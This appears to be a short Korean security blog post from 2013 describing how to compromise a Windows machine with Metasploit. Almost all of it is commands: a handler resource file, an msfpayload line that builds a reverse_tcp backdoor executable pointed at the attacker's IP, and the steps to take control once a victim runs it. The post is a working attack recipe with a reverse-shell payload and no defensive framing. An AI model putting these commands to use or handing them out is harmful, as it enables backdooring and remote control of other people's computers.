IT/Security
Metasploit meterpreter를 이용한 침투
Hotman
2013. 8. 23. 17:19
- 리소스 파일 생성 (attacker_.rc)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set ExitSession false
exploit -j -z
- reverse_tcp 백도어 생성
msfpayload windows/meterpreter/reverse_tcp LHOST=<공격자 ip> X > reverse_tcp.exe
- 공격자 pc에서 리소스 실행
msfconsole -r attacker_.rc
- 사용자가 백도어를 실행하게 되면 reverse_tcp connection 연결
- 공격자는 sessions -i <번호>를 통해 meterpreter 조작 가능